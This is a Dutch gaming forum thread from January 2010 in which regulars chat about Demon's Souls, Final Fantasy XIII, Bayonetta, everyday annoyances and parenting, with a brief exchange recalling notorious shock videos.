quote:Op donderdag 7 januari 2010 10:56 schreef Chocobo het volgende:
[..]
Gisteravond new game + gestart,.... alsnog naar de koning gegaan die ik in de eerste playthrough miste. Even zijn ass gekicked als human. Niet veel later werd ik invaded door iemand. Die had er seeerieus last van. Wilde me even een lesje leren geloof ik. Hij heeft al zijn grass en lotus items opgemaakt aan me en ging toen op de vlucht,.... niet veel later stierf hij!
Heb nu die twee zwaarden (soul en demon brander ofzo?) Die ga ik samenvoegen om het beste zwaard te maken ofzo. Vanavond verder!
quote:Op donderdag 7 januari 2010 15:11 schreef Ker_Plunk het volgende:
[..]Ga vanavond NG+++ denk completen
quote:Op donderdag 7 januari 2010 15:13 schreef Ker_Plunk het volgende:
Wat was dat filmpje waar jullie zo van kotsten?
Geen idee Gijs. Niet gekeken,... schijnt gruwelijk te zijn! Iets van een moord,.. half stervende man,.. kruipt ofzo en dan doorsteken,... ogen eruit halen ofzo. Geen idee,... heel vluchtig gelezen!quote:
3 guys 1 hammer, ik denk dat er niet wordt gestoken.quote:Op donderdag 7 januari 2010 15:20 schreef Chocobo het volgende:
[..]
Geen idee Gijs. Niet gekeken,... schijnt gruwelijk te zijn! Iets van een moord,.. half stervende man,.. kruipt ofzo en dan doorsteken,... ogen eruit halen ofzo. Geen idee,... heel vluchtig gelezen!
quote:Op donderdag 7 januari 2010 15:13 schreef Ker_Plunk het volgende:
Wat was dat filmpje waar jullie zo van kotsten?
Als je niet gekeken en gelezen hebt,... waarom praat je dan?quote:Op donderdag 7 januari 2010 15:21 schreef Wessiej het volgende:
[..]
3 guys 1 hammer, ik denk dat er niet wordt gestoken.
Verzuurde oude man.quote:Op donderdag 7 januari 2010 15:24 schreef Chocobo het volgende:
[..]
Als je niet gekeken en gelezen hebt,... waarom praat je dan?
De hele tijd dat plaatje als je het topic opentquote:
Gijs. Hoe geef ik mezelf een schop onder de kont met Demons Souls? Ik heb het gevoel dat ik stagneer, teveel grind!quote:
5-1 is dan redelijk.quote:Op donderdag 7 januari 2010 15:29 schreef Strolie75 het volgende:
[..]
Gijs. Hoe geef ik mezelf een schop onder de kont met Demons Souls? Ik heb het gevoel dat ik stagneer, teveel grind!
Wat kan ik het beste doen na 3-1? Ik heb 1-2, 1-2, 2-1, 2-2 en 4-1 afgerond.
2-3! Mega demon!! Dan kan je naar 1-3.quote:Op donderdag 7 januari 2010 15:29 schreef Strolie75 het volgende:
[..]
Gijs. Hoe geef ik mezelf een schop onder de kont met Demons Souls? Ik heb het gevoel dat ik stagneer, teveel grind!
quote:Op donderdag 7 januari 2010 15:29 schreef Strolie75 het volgende:
[..]
Ik zie het filmpje nog voor me, bovenin de top 3 ergste filmpjes voor me.quote:
Ik kijk nog liever 2G1C de hele dag,... sterker nog,... ik zou mee doen!quote:Op donderdag 7 januari 2010 15:34 schreef Bastard het volgende:
[..]
Ik zie het filmpje nog voor me, bovenin de top 3 ergste filmpjes voor me.
- 3 guys 1 hammer
- 2 girls 1 cup
- Amerikaanse heli piloot die na een crash word gevonden door de vijand...
Wat doen ze bij die 3e? Tekst is minder erg als woordenquote:Op donderdag 7 januari 2010 15:34 schreef Bastard het volgende:
[..]
- 3 guys 1 hammer
- 2 girls 1 cup
Alle 3 niet gezien. Wil ik zou houden!quote:Op donderdag 7 januari 2010 15:34 schreef Bastard het volgende:
[..]
- 3 guys 1 hammer
- 2 girls 1 cup
Ja die staat me ook nog bij. Arme gozer,.... ouders hebben dat gewoon op TV kunnen zien,.... OMFG! Niet voor te stellen. 2G1C is proberen te blijven kijken,... heeft absoluut humor. Ik hou van de grappige kant van Internet,... kan er altijd zo om lachen. De ogrish kant trek ik absoluut niet!quote:Op donderdag 7 januari 2010 15:36 schreef Strolie75 het volgende:
[..]
Alle 3 niet gezien. Wil ik zou houden!
Ik ben ergens begin 2000 afgehakt bij een onthoofdingsfilmpje. Was nog voor de tijd van YouTube.
Nou ja iets in een veld liggen van een zwaar gewonde amerikaanse piloot, vooruit kruipen op zn armen omdat zn benen kapot zijn.quote:Op donderdag 7 januari 2010 15:36 schreef Wessiej het volgende:
[..]
Wat doen ze bij die 3e? Tekst is minder erg als woorden
Nou ja van ongelukken daar aan toe.. maar van die bomaanslag in madrid (trein) was een hele serie.. kreeg ik het ook ff koud.quote:Op donderdag 7 januari 2010 15:39 schreef Chocobo het volgende:
[..]
De ogrish kant trek ik absoluut niet!
Die smiley ernaast ookquote:Op donderdag 7 januari 2010 15:47 schreef Ker_Plunk het volgende:
Keertje filmpje gezien van een russische soldaat van wie ze keel werdt doorgesneden… daarna ook geen zin meer in
quote:Op donderdag 7 januari 2010 15:46 schreef Bastard het volgende:
[..]
Nou ja iets in een veld liggen van een zwaar gewonde amerikaanse piloot, vooruit kruipen op zn armen omdat zn benen kapot zijn.
Hij heeft veel pijn, draait zich om wanneer hij mensen hoort (taliban shit) die lachen hem wat uit. Hij smeekt, smeekt, huilt.. en ze schieten hem lachend eerst in zn buik.. en daarna nog een paar keer en dan echt dood.
Mensen zijn zo hard.. en dan te bedenken dat dit allleen beelden zijn omdat we tegenwoordig makkelijk beeld hebben, dit gebeurt natuurlijk duizenden jaren. Ziekquote:
Klopt, zie Vietnam oorlog.quote:Op donderdag 7 januari 2010 15:49 schreef Bastard het volgende:
[..]
Mensen zijn zo hard.. en dan te bedenken dat dit allleen beelden zijn omdat we tegenwoordig makkelijk beeld hebben, dit gebeurt natuurlijk duizenden jaren. Ziek
Ik ben naar een museum geweest in Vietnam... Daar hingen echt alleen maar gruwelijke foto's, want zij willen heel erg graag laten zien hoe de Amerikanen de burgers behandeldenquote:
Ja.. ergens is het een ziekelijke vorm van ramptoerisme, ik wil het dan zien weet je wel.quote:Op donderdag 7 januari 2010 15:51 schreef kepler het volgende:
Dat soort filmpjes trek ik echt niet en ik heb ook weinig gezien gelukkig
Enige wat ik een stukje heb gezien was toen met Koninginnedag. Zat ergens in Laos ofzo en klikte nietsvermoedend op een filmpje op nu.nl.... Fucking hell zegWaarom zou je dat willen zien???
Ja foto's zat, kan me er zo 1 herrineren..quote:Op donderdag 7 januari 2010 15:54 schreef kepler het volgende:
[..]
Ik ben naar een museum geweest in Vietnam... Daar hingen echt alleen maar gruwelijke foto's, want zij willen heel erg graag laten zien hoe de Amerikanen de burgers behandelden
Echt veel bizarre en onmenselijke dingen daar gebeurt in Azie... We weten maar 10% van alle gruwelijkheden daar denk ik zo
Ik blijf ook niet staan kijken bij ongelukken. Ik kijk wel even of ze niet toevallig hulp nodig hebben (meestal niet als er al politie staatquote:Op donderdag 7 januari 2010 15:54 schreef Bastard het volgende:
[..]
Ja.. ergens is het een ziekelijke vorm van ramptoerisme, ik wil het dan zien weet je wel.
Maar filmpje van vanmorgen, ik dacht dat het een ziek sexspelletje zou zijn.. nou ziek was het zeker zo om 0800 uur sochtends
Die ene met dat verbrande meisje, dat is de bekendste. Maar dat is nog een foto van een groene weide met kleurige bloemen vergeleken met andere foto'squote:Op donderdag 7 januari 2010 15:55 schreef Bastard het volgende:
[..]
Ja foto's zat, kan me er zo 1 herrineren..
Of de folteringen in Wo2.
Neee dat ook niet.. dan zeg ik.. hallo rij eens door ik wil naar huis!quote:Op donderdag 7 januari 2010 15:55 schreef kepler het volgende:
[..]
Ik blijf ook niet staan kijken bij ongelukken. Ik kijk wel even of ze niet toevallig hulp nodig hebben (meestal niet als er al politie staat) en fiets dan gewoon door. Waarom zou je jezelf bewust opzadelen met die gruwelijke beelden?
Was er ook niet iets .. nee laat maar.quote:Op donderdag 7 januari 2010 15:57 schreef kepler het volgende:
[..]
Die ene met dat verbrande meisje, dat is de bekendste. Maar dat is nog een foto van een groene weide met kleurige bloemen vergeleken met andere foto's
dat is ook wel een heel ranzig filmpjequote:Op donderdag 7 januari 2010 15:47 schreef Ker_Plunk het volgende:
Keertje filmpje gezien van een russische soldaat van wie ze keel werdt doorgesneden… daarna ook geen zin meer in
Yup, van het weekend weer kans op sneeuwstorm. Ze spreken zelfs van een mogelijke sneeuwstormquote:Op donderdag 7 januari 2010 15:59 schreef Bastard het volgende:
[..]
Was er ook niet iets .. nee laat maar.
Word er nog sneeuw verwacht eigenlijk?
Gelukkig heb je een iPhone, en ik meen het!quote:Op donderdag 7 januari 2010 16:48 schreef Strolie75 het volgende:
Hey lekker.... 45 minuten vertraging. NS
Nieuwe Wired gekocht, kop koffie gehaald, muziekje op. Was wel uit te houden.quote:Op donderdag 7 januari 2010 17:15 schreef Wessiej het volgende:
[..]
Gelukkig heb je een iPhone, en ik meen het!
Op station goeie voorzieningen.quote:Op donderdag 7 januari 2010 17:31 schreef Strolie75 het volgende:
[..]
Nieuwe Wired gekocht, kop koffie gehaald, muziekje op. Was wel uit te houden.
Toch zaterdag auto wassenquote:Op donderdag 7 januari 2010 16:05 schreef kepler het volgende:
[..]
Yup, van het weekend weer kans op sneeuwstorm. Ze spreken zelfs van een mogelijke sneeuwstorm
En het blijft ook koud
[ afbeelding ]
Vooral komende dagen koud
Is daar geen Iphone app voor?quote:Op donderdag 7 januari 2010 16:48 schreef Strolie75 het volgende:
Hey lekker.... 45 minuten vertraging. NS
Want Tablets bestaan nog niet?quote:Op donderdag 7 januari 2010 18:56 schreef Ker_Plunk het volgende:
Apple haters
Deze maand de iTablet aankondigingGa hem niet kopen omdat ik er niks aan heb maar Apple is wel de innovateur
Was meteen me laatste Apple ophemeling van de maand B.
quote:Op donderdag 7 januari 2010 20:28 schreef Strolie75 het volgende:
Eindbaas van 3-1 verslagen
5-1 afgemaakt (kort level zeg).
Poison Cloud gekocht, en toen The Old King verslagen door hem te vergiftigen!![]()
Ga hem nu weer ff doodmakenquote:Op donderdag 7 januari 2010 20:28 schreef Strolie75 het volgende:
Eindbaas van 3-1 verslagen
5-1 afgemaakt (kort level zeg).
Poison Cloud gekocht, en toen The Old King verslagen door hem te vergiftigen!![]()
Gijs...doe even normaal.quote:Op donderdag 7 januari 2010 21:33 schreef Ker_Plunk het volgende:
Deacon Tigra's impressie van FFXIII
Na deel 10 ben ik een beetje een afhaker geworden van de serie. Mistte de echte FF feeling en stemmen blijf ik zelfs anno 2010 not done vindenHeb het idee dat ook deel XIII het gewoon net niet gaat halen
DT is op dit moment nog maar bij 2 steden geweest en er zijn gewoon geen shops
![]()
True. Maar als hij tot op het na zoveel uur nog zo weinig steden heeft gehadquote:Op donderdag 7 januari 2010 21:41 schreef Strolie75 het volgende:
[..]
Gijs...doe even normaal.FF is en blijft geweldig!
De shops benader je via het menu, en als die steden net zo groot zijn als in FFXII vind ik het best.
Doet dat zwaard van The Old King nog iets bijzonders?quote:Op donderdag 7 januari 2010 21:51 schreef Ker_Plunk het volgende:
[..]
True. Maar als hij tot op het na zoveel uur nog zo weinig steden heeft gehadDat vond ik nou altijd het leuke van FF…
DS: Me Blueblood Sword is nu officeel sterker als de Northern RegaliaEn sneller, en mooier
Dat is de Demonbrandt, samen met de Soulbrandt wordt dat Northern Regalia; ontzettend sterk wapen. Niet zo heel snel maar groot bereik. Lange tijd gebruiktquote:Op donderdag 7 januari 2010 21:52 schreef Strolie75 het volgende:
[..]
Doet dat zwaard van The Old King nog iets bijzonders?
Ja het doet me niet veel!quote:Op donderdag 7 januari 2010 21:33 schreef Ker_Plunk het volgende:
Deacon Tigra's impressie van FFXIII
Na deel 10 ben ik een beetje een afhaker geworden van de serie. Mistte de echte FF feeling en stemmen blijf ik zelfs anno 2010 not done vindenHeb het idee dat ook deel XIII het gewoon net niet gaat halen
DT is op dit moment nog maar bij 2 steden geweest en er zijn gewoon geen shops
![]()
Kijkquote:Op donderdag 7 januari 2010 21:41 schreef Strolie75 het volgende:
[..]
Gijs...doe even normaal.FF is en blijft geweldig!
De shops benader je via het menu, en als die steden net zo groot zijn als in FFXII vind ik het best.
XIII is voor mij de beslissende gamequote:Op donderdag 7 januari 2010 22:51 schreef Chocobo het volgende:
Wat doe je als we FF allemaal verschrikkelijk kut vindenDan worden we steeds skeptischer,... totdat het moment komt dat je een FF (deel 16 bv) game koopt op basis van reviews en de blinde aanschaf verdwijnt!
quote:Wow, this is pretty heavy stuff. According to Square Enix president Yoichi Wada, Final Fantasy XIII might be the swan song of the traditional RPG at Square Enix. Although Wada expects XIII to do great things for his company, he believes that Square's internal studios should be put to work on creating "next generation" gameplay.
"I believe Final Fantasy XIII is going be something special, and that it’s going to be well received by the audience," states Wada. "But whether we are going to continue to internally create this type of game remains to be seen, because I actually feel that the team that was involved with Final Fantasy XIII should next move on to create and generate some 'next generation' forms of play.
"I really think that the Final Fantasy team could create something completely different, but at the moment they’re strictly catering to the particular audience they have now."
This is actually pretty astounding. Final Fantasy might have tried all manner of different combat and character progression systems over the years, but its core JRPG gameplay as always remained intact, and of course won Square Enix a huge fan following. Abandoning that winning formula is pretty bloody huge, and if Squenix dared to do it, I wonder what its hardcore fanbase would think.
What do you think, first and foremost? Should Square Enix abandon all the old ways and focus on doing entirely new things, or are there some aspects of Final Fantasy that should never change?
Is daar geen iPhone app voor?quote:Op vrijdag 8 januari 2010 09:06 schreef Wessiej het volgende:
iPhone![]()
Pleurt een beetje al mn muziek eraf.
Back-up app,.... security app? Protect music app? Geen idee!quote:
USB kabel aan pc hangen en muziek erop zetten appquote:Op vrijdag 8 januari 2010 09:15 schreef Chocobo het volgende:
[..]
Back-up app,.... security app? Protect music app? Geen idee!
quote:Op vrijdag 8 januari 2010 09:06 schreef Wessiej het volgende:
iPhone![]()
Pleurt een beetje al mn muziek eraf.
Ik mis 'm...quote:
Wat is er met je blog gebeurt Gijs?quote:
Najaquote:Op vrijdag 8 januari 2010 10:10 schreef Strolie75 het volgende:
[..]
Wat is er met je blog gebeurt Gijs?Lijkt wel alsof er een emo op los is gegaan.
Ben het wel een beetje met hem eens Gijsquote:Op vrijdag 8 januari 2010 10:10 schreef Strolie75 het volgende:
[..]
Wat is er met je blog gebeurt Gijs?Lijkt wel alsof er een emo op los is gegaan.
Dat 'ie donker is klopt ook wel, maar lichte tekst op donker is veel rustiger voor je ogen omdat ze minder lichtprikkels krijgen (true storyquote:Op vrijdag 8 januari 2010 10:19 schreef Chocobo het volgende:
Maar ik hou dan ook van rustige kleuren denk ik. Vind het wel geweldig om te zien hoe je zoveel web 2.0 features erin probeert te krijgenZelf zoek ik in een blog simpelheid en rust. Het voelt ineens als een wannabee game-site aan Gijs. Kleuren-combo voor lezen is niet prettig. Zo donker allemaal,... inderdaad iets emo's. Persoonlijk vind ik de inhoud uiteraard heerlijk, maar de setting wat minder! Qua layout dus minder prettig dan je had,... qua features zie ik nog niet veel verschil, maar ik merk dat je meer wilt.
Nee alleen strol, 2 blogs extra deze week!quote:Op vrijdag 8 januari 2010 11:27 schreef Notorious_Roy het volgende:
Rustige dag vandaag, iedereen hard gewerkt deze week?
Ik zal de koelvloeistof es bij vullen ipv water.quote:Op vrijdag 8 januari 2010 10:41 schreef Bastard het volgende:
http://www.geenstijl.nl/m(...)wordt_nog_erger.html
Heerlijk!
Motor warm draaien, is het ook ondooid... tis alleen kut als je dan gaat spuiten en het meteen op je vooruit opvriestquote:Op vrijdag 8 januari 2010 12:34 schreef gijsje79 het volgende:
[..]
Ik zal de koelvloeistof es bij vullen ipv water.
Ja moet toch eerst krabben.quote:Op vrijdag 8 januari 2010 12:37 schreef Bastard het volgende:
[..]
Motor warm draaien, is het ook ondooid... tis alleen kut als je dan gaat spuiten en het meteen op je vooruit opvriest
Net weer 3 uur in overleg gezeten ja.quote:Op vrijdag 8 januari 2010 11:33 schreef Bastard het volgende:
Nee alleen strol, 2 blogs extra deze week!
Je hebt Bayonetta gekocht!quote:Op vrijdag 8 januari 2010 13:27 schreef Wessiej het volgende:
Darksiders verdient de aanschaf vanwege de cover
[ afbeelding ]
Niet mijn picquote:Op vrijdag 8 januari 2010 13:31 schreef Strolie75 het volgende:
[..]
Je hebt Bayonetta gekocht!
Hype me eens...ik sta op de drempel.
Darksiders, is dat de gewone versie? Of is het limited?quote:Op vrijdag 8 januari 2010 13:27 schreef Wessiej het volgende:
Darksiders verdient de aanschaf vanwege de cover
[ afbeelding ]
Zover ik weet is dat de normale cover.quote:Op vrijdag 8 januari 2010 13:33 schreef Notorious_Roy het volgende:
[..]
Darksiders, is dat de gewone versie? Of is het limited?
Left 4 Dead 2 is zooooooooooooooooooo goed. Had ik niet verwacht!quote:Op vrijdag 8 januari 2010 13:33 schreef Wessiej het volgende:
Morgen als het goed is Bayonetta en Left 4 Dead 2 bij de post
Pfoe! Doe al een week zonder nieuwe games. Het gaat goed met mijn voornemens voor 2010quote:Op vrijdag 8 januari 2010 13:34 schreef Wessiej het volgende:
[..]
Zover ik weet is dat de normale cover.
Ik heb het lastig.quote:Op vrijdag 8 januari 2010 13:35 schreef Notorious_Roy het volgende:
Pfoe! Doe al een week zonder nieuwe games. Het gaat goed met mijn voornemens voor 2010
Vind het ook lastig ja, serieus ookquote:Op vrijdag 8 januari 2010 13:35 schreef Notorious_Roy het volgende:
[..]
Pfoe! Doe al een week zonder nieuwe games. Het gaat goed met mijn voornemens voor 2010
FFXIII en GoW3 in pre-order. Betalen bij ophalen/verzenden.quote:Op vrijdag 8 januari 2010 13:40 schreef Strolie75 het volgende:
[..]
Ik heb het lastig.
Ik heb wel Miles Edgeworth al besteld en betaald, en Mass Effect 2 gepreordered. Maar Bayonetta lonkt.
quote:Thanks for ordering from Amazon.co.uk. Your purchase information appears below.
1 "Bayonetta (Xbox 360)"
Video Game; £35.44
Sold by: Amazon EU S.a.r.L.
http://www.metacritic.com/games/platforms/xbox360/bayonettaquote:Op vrijdag 8 januari 2010 13:52 schreef Strolie75 het volgende:
[..]
Heb wel zin in een maffe over the top Japanse actiegame. In principe hetzelfde genre spel als Demons Souls...maar dan weer totaal anders!
Een 10/10 van Edge, een 9/10 van Eurogamer.quote:Op vrijdag 8 januari 2010 13:53 schreef Wessiej het volgende:
http://www.metacritic.com/games/platforms/xbox360/bayonetta
Slimme aankoop!
Ja onder werktijd toch of niet dan? Of is dat 'extra werk?quote:Op vrijdag 8 januari 2010 13:23 schreef Strolie75 het volgende:
[..]
Net weer 3 uur in overleg gezeten ja.
Heb geen enkel probleem hier. Sinds november doe ik het al met AC2 en DS. Eind januari weer iets nieuws,.... Mass Effectquote:Op vrijdag 8 januari 2010 13:35 schreef Notorious_Roy het volgende:
[..]
Gijs het is drukker dan de meeste games bij elkaar. Demo al geprobeerd? Ik trek het persoonlijk totaal niet.quote:Op vrijdag 8 januari 2010 13:52 schreef Strolie75 het volgende:
[..]
Heb wel zin in een maffe over the top Japanse actiegame. In principe hetzelfde genre spel als Demons Souls...maar dan weer totaal anders!
Serieus,... ik verbaas me echt dit bericht. Het is gewoon echt zoquote:Op vrijdag 8 januari 2010 13:16 schreef Strolie75 het volgende:
Met de taxi naar fietsles. Nederland.
http://www.telegraaf.nl/b(...)scursus__.html?p=1,1
Maar jij bent dan ook een vreemde snuiter af en toequote:Op vrijdag 8 januari 2010 14:01 schreef Chocobo het volgende:
[..]
Heb geen enkel probleem hier. Sinds november doe ik het al met AC2 en DS. Eind januari weer iets nieuws,.... Mass Effect
Ik durf er op te wedden dat hij de demo niet gespeeld heeftquote:Op vrijdag 8 januari 2010 14:02 schreef Chocobo het volgende:
[..]
Gijs het is drukker dan de meeste games bij elkaar. Demo al geprobeerd? Ik trek het persoonlijk totaal niet.
Weer 1 voor de fail site!quote:Op vrijdag 8 januari 2010 14:05 schreef Chocobo het volgende:
[..]
Serieus,... ik verbaas me echt dit bericht. Het is gewoon echt zoOMG! Serieus,.... brengen ze mij ook naar het werk? Ik geef liever mijn belastinggeld uit aan het vervoer van ouderen,....
Bah,....!
AC2, DS, ME,... dat zijn toch prima games Gijs?quote:Op vrijdag 8 januari 2010 14:06 schreef Notorious_Roy het volgende:
[..]
Maar jij bent dan ook een vreemde snuiter af en toe
[..]
Ik durf er op te wedden dat hij de demo niet gespeeld heeft
Ja serieus Gijs,... we zouden echt een fail site moeten bijhoudenquote:
Sure, dat wel. Maar er is zoveel uitgekomen en je blijft er zo koel onderquote:Op vrijdag 8 januari 2010 14:09 schreef Chocobo het volgende:
[..]
AC2, DS, ME,... dat zijn toch prima games Gijs?
Zoveel uitgekomen? Maar je moet toch eens keuzes maken. Je kan toch niet alles kopen. Hoop geld allemaal hoor. Tevens besteedt men naar mijn idee ook minder tijd aan de games die je dan al hebt.quote:Op vrijdag 8 januari 2010 14:10 schreef Notorious_Roy het volgende:
[..]
Sure, dat wel. Maar er is zoveel uitgekomen en je blijft er zo koel onderDat vind ik vreemd
Doen alsof je de namen van games niet weetquote:Op vrijdag 8 januari 2010 14:12 schreef Chocobo het volgende:
[..]
Zoveel uitgekomen? Maar je moet toch eens keuzes maken. Je kan toch niet alles kopen. Hoop geld allemaal hoor. Tevens besteedt men naar mijn idee ook minder tijd aan de games die je dan al hebt.
Bayonetta of hoe dat ook heet hoef ik echt niet. Darkriders ook niet,... dat zijn de games van het moment toch? Nee, ik ben met Mass Effect wel tot half maart weer zoet!
Darksider dan,... weet niet hoe je het spelt. Het boeit me niet dus ik weet het ook echt niet.quote:Op vrijdag 8 januari 2010 14:13 schreef Wessiej het volgende:
[..]
Doen alsof je de namen van games niet weet
Paar post hierboven nog de coverquote:Op vrijdag 8 januari 2010 14:13 schreef Chocobo het volgende:
[..]
Darksider dan,... weet niet hoe je het spelt. Het boeit me niet dus ik weet het ook echt niet.
quote:
Wat begrijp je hier niet aan?quote:Op vrijdag 8 januari 2010 14:13 schreef Chocobo het volgende:
[..]
Het boeit me niet dus ik weet het ook echt niet.
Wij zitten niet helemaal op een lijn geloof ikquote:Op vrijdag 8 januari 2010 14:17 schreef Wessiej het volgende:
[..]
Ik zeg dat de cover hierboven staat, zeg niet dat het je moet boeien.
Zijn verkoop van Forza3 nog voordat hij hem zelf in bezit had ookquote:Op vrijdag 8 januari 2010 14:10 schreef Chocobo het volgende:
Strols impulsieve 'omdat het Sega is' aanschaf mag ook op de failsite
Die is epischquote:Op vrijdag 8 januari 2010 14:19 schreef Bastard het volgende:
[..]
Zijn verkoop van Forza3 nog voordat hij hem zelf in bezit had ook![]()
Klimaat en weer is hetzelfde jaquote:Op vrijdag 8 januari 2010 14:20 schreef Chocobo het volgende:
Opwarming van de Aarde zeggen ze danDe hele wereld is gek geworden!
![]()
http://www.telegraaf.nl/b(...)lorida__.html?p=38,2
Extremen horen daar wel bij ja..quote:Op vrijdag 8 januari 2010 14:20 schreef Chocobo het volgende:
Opwarming van de Aarde zeggen ze danDe hele wereld is gek geworden!
![]()
http://www.telegraaf.nl/b(...)lorida__.html?p=38,2
Nee dat probleem heb ik niet.. maar ze is nu zo fucking eigenwijs en brutaal!quote:Op vrijdag 8 januari 2010 14:31 schreef Magneet het volgende:
Merlijn bevalt het trouwens wel op school, doodmoe natuurlijk maar slapen 's avonds ho maar
Nee...maar ik trek demo's gek genoeg nooit.quote:Op vrijdag 8 januari 2010 14:02 schreef Chocobo het volgende:
Gijs het is drukker dan de meeste games bij elkaar. Demo al geprobeerd? Ik trek het persoonlijk totaal niet.
Don't say we didn't warn you...quote:Op vrijdag 8 januari 2010 14:33 schreef Strolie75 het volgende:
[..]
Nee...maar ik trek demo's gek genoeg nooit.Misschien dat ik me er onbewust al op instel dat ik na een tijdje niet verder kan spelen. Heb ik altijd al gehad. Filmpjes en reviews doen me meer. En bij Bayonetta spat de originaliteit er vanaf. Daar heb ik sowiezo een zwak voor.
Leuke comedy is dat ook:quote:
QFT!quote:Op vrijdag 8 januari 2010 14:35 schreef Notorious_Roy het volgende:
[..]
Don't say we didn't warn you...
Dat was een tactische zet.quote:
Ik gun je een nieuw spel Gijs,... en plezier uiteraard. Vraag me alleen af of je hier goed aan doet!quote:Op vrijdag 8 januari 2010 14:33 schreef Strolie75 het volgende:
[..]
Nee...maar ik trek demo's gek genoeg nooit.Misschien dat ik me er onbewust al op instel dat ik na een tijdje niet verder kan spelen. Heb ik altijd al gehad. Filmpjes en reviews doen me meer. En bij Bayonetta spat de originaliteit er vanaf. Daar heb ik sowiezo een zwak voor.
Ook zo moeilijk allemaal om te bevatten. Een NGC programma hierover geeft me meestal nog meer vragenquote:
quote:Op vrijdag 8 januari 2010 14:32 schreef Bastard het volgende:
[..]
Nee dat probleem heb ik niet.. maar ze is nu zo fucking eigenwijs en brutaal!
Zo niet dan verkoop ik hem weer.quote:Op vrijdag 8 januari 2010 14:37 schreef Chocobo het volgende:
Ik gun je een nieuw spel Gijs,... en plezier uiteraard. Vraag me alleen af of je hier goed aan doet!
quote:Op vrijdag 8 januari 2010 14:39 schreef Strolie75 het volgende:
[..]
Zo niet dan verkoop ik hem weer.
Maar die review van Gametrailer.com ziet er tof uit hoor. Extreme over the top Ninja Gaiden.
Een watte?quote:Op vrijdag 8 januari 2010 14:38 schreef Chocobo het volgende:
[..]
Ook zo moeilijk allemaal om te bevatten. Een NGC programma hierover geeft me meestal nog meer vragen
Ja opstandig, zal het wel even vertellen enzo... maar ze zijn nog zooo breekbaar en als ze hun teen stoten met een huilende snotneus snel bij papa op schoot troostenquote:Op vrijdag 8 januari 2010 14:39 schreef Chocobo het volgende:
[..]
Ja ze leren shit Gijs,...Erg btutaal inderdaad,... herkenbaar!
Nee ik laat me in de hoek zetten.quote:Op vrijdag 8 januari 2010 14:48 schreef Strolie75 het volgende:
Hoe doen jullie straffen dan? Zonder eten naar bed? Sorry laten zeggen? Lijkt me zo moeilijk om consequent te handelen.
zoooo herkenbaar, hier is straf trouwens op de trap zitten ( zeg maar de Supernanny methode) Werkt meestal vrij goed.quote:Op vrijdag 8 januari 2010 14:52 schreef Bastard het volgende:
Maar serieus.. is ook moeilijk soms. Vooral als het gedrag een half uur geleden bestraft is en daarna weer begint.. of het gezuig op een andere manier doorgaat bijvoorbeeld "papa drinken is op" .. ja hoe vraag je dat dan? "papa mag ik drinken?" goed kom je aan met een beker.. "nee ik wil geen limonade"..
drinkt toch maar op "mag ik chocomelk alsjblieft papa? " .. nee in een andere beker... IN EEN ANDERE BEKER ZEG IK TOCH?
En dan heb je alles weer gehad en uitgelegd... word er uiteindelijk niks opgedronken.
quote:Op vrijdag 8 januari 2010 14:48 schreef Strolie75 het volgende:
Hoe doen jullie straffen dan? Zonder eten naar bed? Sorry laten zeggen? Lijkt me zo moeilijk om consequent te handelen.
Bij ons ook.. even apart zetten, even die stoornis doorbreken, ga maar op de gang staan. En daarna mag je vertellen waarom ik je op de gan heb gezet, weet je het niet? Ga dan nog maar wat langer staan.quote:Op vrijdag 8 januari 2010 14:56 schreef Magneet het volgende:
[..]
zoooo herkenbaar, hier is straf trouwens op de trap zitten ( zeg maar de Supernanny methode) Werkt meestal vrij goed.
quote:
Can you say "copy"quote:Op vrijdag 8 januari 2010 15:27 schreef Notorious_Roy het volgende:
http://www.marktplaats.nl(...)fta_ind%3D3%26fs%3D1
sja je hebt nog steeds mensen die betalen voor gedownloade games.quote:Op vrijdag 8 januari 2010 15:27 schreef Notorious_Roy het volgende:
http://www.marktplaats.nl(...)fta_ind%3D3%26fs%3D1
quote:Op vrijdag 8 januari 2010 15:21 schreef Chocobo het volgende:
[..]
Videos
Unavailable
You are not in a geographic region that has access to this content.
Launch Trailerquote:
Gijs,... het lijkt me echt verschrikkelijk. Begin is prachtig,... maar dan begint de daadwerkelijke gameplayquote:
Serieus,.... wat een aanfluiting!quote:Op vrijdag 8 januari 2010 17:51 schreef Strolie75 het volgende:
Poging 2
http://thefilmstage.com/2010/01/08/joe-carnahans-a-team-trailer/
quote:Op vrijdag 8 januari 2010 17:56 schreef kepler het volgende:
Nee, ik kon geen stempelautomaat vinden voor mn strippenkaart. Besloot de gok te wagen (2 minuten), is er bij de uitgang van het station controle
37 euro!Maar ik kon volgens het mannetje wel beroep aantekenen, omdat alles zo onduidelijk is en er dus geen stempelautomaten meer staan
Gijs...wat ben je negatief vandaag.quote:
Serieus? Valt toch wel mee? Ik spreek gewoon wat ik denk. Dit ziet er toch kansloos uit! Echt kansloos!quote:Op vrijdag 8 januari 2010 19:24 schreef Strolie75 het volgende:
[..]
Gijs...wat ben je negatief vandaag.
Ik vind het er wel goed uitzien. Leuke cast. Maar misschien is het meer nostalgie.quote:Op vrijdag 8 januari 2010 19:26 schreef Chocobo het volgende:
[..]
Serieus? Valt toch wel mee? Ik spreek gewoon wat ik denk. Dit ziet er toch kansloos uit! Echt kansloos!
Het is juist de nostalgie waardoor ik het niet trek. Die characters zijn het A-team gewoon niet,... althans niet voor mij. Standaard aktie-flick met standaard grappen.quote:Op vrijdag 8 januari 2010 19:27 schreef Strolie75 het volgende:
[..]
Ik vind het er wel goed uitzien. Leuke cast. Maar misschien is het meer nostalgie.
Ezel,... zo maak je het alleen maar gladder. Hier doen ze het overigens wel in de buurt,... echter kan je daar ook verschrikkelijk hard vallen. Zijn juist de oudjes die het doen.quote:Op vrijdag 8 januari 2010 19:29 schreef Strolie75 het volgende:
Hebben jullie je stoepje al geveegd?
Goed om te lezen dat JP weer de vinger bij de pols van de natie heeft.
http://www.telegraaf.nl/b(...)e_stoep__.html?p=2,2
quote:Op vrijdag 8 januari 2010 22:19 schreef Strolie75 het volgende:
"Weapon" is verkeerd gespeld.
Wat een idioot.
Heb je geen google op de Mac?quote:Op vrijdag 8 januari 2010 22:19 schreef Strolie75 het volgende:
"Weapon" is verkeerd gespeld.
Wat een idioot.
Allebei klonen en rip-offs, allebei awesome budget titelsquote:
Wie?quote:Op vrijdag 8 januari 2010 22:16 schreef Scarface2004 het volgende:
Rappert Kempi
Ik zeg het nog maar een keer: "Ik speel savonds, en niet snaschts, dan slaap ik"quote:Op zaterdag 9 januari 2010 02:27 schreef gijsje79 het volgende:
[..]
Waar was jij dan?
Heb je niet online gezien.
